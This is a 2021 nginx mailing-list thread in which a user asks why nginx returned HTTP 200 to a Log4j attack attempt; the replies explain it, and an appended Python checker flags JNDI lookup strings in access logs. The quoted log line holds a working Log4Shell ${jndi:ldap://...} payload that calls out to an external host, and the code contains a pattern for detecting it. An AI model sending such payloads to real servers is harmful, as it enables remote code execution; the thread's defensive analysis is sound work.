Nginx is returning a 200 because the request is a "GET /", and I am assuming 
your nginx configurations allow GETs to "/".

Justin

On 29/12/2021, 10:20 AM, "nginx on behalf of Mauro Tridici" 
<nginx-boun...@nginx.org on behalf of mauro.trid...@cmcc.it> wrote:


    Thank you very much for your reply. I really appreciated it.
    I'll wait for the final gurus' feedback too.

    Mauro

    > On 29 Dec 2021, at 18:03, lists <li...@lazygranch.com> wrote:
    > 
    > That IP space is certified shady. I detect the occasional hack from them. See
    > 
    > https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/
    > 
    > and
    > 
    > https://wirelessdataspco.org/faq.php
    > 
    > These wireless companies will do anything for money including leasing their IP space.
    > 
    > I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers' customers. But I am appalled that highly profitable wireless providers lease IPv4 space to hackers for what is pocket change for them.
    > 
    > I will leave it up to the gurus to parse the log.  
    > 
    > 
    > Original Message
    > 
    > From: mauro.trid...@cmcc.it
    > Sent: December 29, 2021 6:55 AM
    > To: nginx@nginx.org
    > Reply-to: nginx@nginx.org
    > Subject: Help request about Log4j attack attempts and NGINX logs meaning
    > 
    > 
    > 
    > 
    > Dear Users,
    > 
    > 
    > I have an old instance of NGINX (v.1.10.1) running as a proxy server on a dedicated hardware platform.
    > Since the proxy service is reachable from the internet, it is constantly exposed to cyber attacks.
    > In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs.
    > 
    > 
    > At this moment, a host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempt.
    > Anyway, in the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was "HTTP/1.1 200" and I'm very worried about it.
    > Log4j and Java packages are NOT installed on the NGINX server and none of the servers behind the proxy use Log4j.
    > 
    > 
    > Could you please help me to understand why the NGINX server's answer was "HTTP/1.1 200"!?
    > 
    > 
    > You can see below the mail notification I received:
    > 
    > 
    > 
    > Attack Notification.
    > 2021 Dec 28 20:45:59
    > 
    > Received From: "hidden_NGINX_server_IP" >/var/log/nginx/access.log
    > Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
    > Src IP: 166.137.252.110
    > Portion of the log(s):
    > 
    > 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://"hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" "-"
    > 
    > 
    > Thank you in advance,
    > Mauro 
    > _______________________________________________
    > nginx mailing list
    > nginx@nginx.org
    > http://mailman.nginx.org/mailman/listinfo/nginx


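As an added example (not from the thread, nginx or the HIDS), a small Python checker that parses access-log lines like the one Mauro posted, percent-decodes the request target, flags "${jndi:...}" lookup strings and reports the callback host, while treating the status column only as what nginx answered for the path, which is Justin's point. The sample log lines are constructed; the hidden server IP is a placeholder and the second and third lines are invented to show an encoded variant and a benign request.

```python
"""Flag Log4Shell-style "${jndi:...}" lookups in nginx access-log lines; the
status column is nginx's answer for the path, not evidence the lookup ran."""
import re
from urllib.parse import unquote

# Constructed sample in nginx "combined" format: the thread's line with the
# server IP replaced by a placeholder, an URL-encoded variant, a benign request.
SAMPLE_LOG = r'''
166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://HIDDEN_SERVER_IP.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" "-"
203.0.113.7 - - [28/Dec/2021:21:46:10 +0100] "GET /index.html?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fx%7D HTTP/1.1" 404 162 "-" "curl/7.64.0" "-"
198.51.100.9 - - [28/Dec/2021:21:47:01 +0100] "GET / HTTP/1.1" 200 3700 "-" "Mozilla/5.0" "-"
'''

LOG_RE = re.compile(  # nginx "combined" format; only the fields used here are named
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# "${jndi:<scheme>://<host>" after decoding; scheme and host go into the report
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^/}\s:]+)', re.I)


def decode_target(target: str) -> str:
    """Percent-decode up to three rounds so encoded payloads become visible."""
    for _ in range(3):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def analyze_line(line: str):
    """Parse one line and attach a JNDI verdict; None if not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_target(m['target'])
    hit = JNDI_RE.search(target)
    return {
        'ip': m['ip'],
        'status': int(m['status']),  # what nginx answered for the path, nothing more
        'target': target,
        'jndi': hit is not None,
        'scheme': hit['scheme'].lower() if hit else None,
        'callback_host': hit['host'] if hit else None,  # where vulnerable Log4j would call out
    }


def find_jndi_attempts(log_text: str) -> list:
    """Return the parsed records of every line carrying a JNDI lookup string."""
    records = (analyze_line(l) for l in log_text.strip().splitlines())
    return [r for r in records if r and r['jndi']]
```

A hit with a 200 from nginx still needs the upstream Java application logs and the egress records for callback_host to tell an attempt from an actual exploitation.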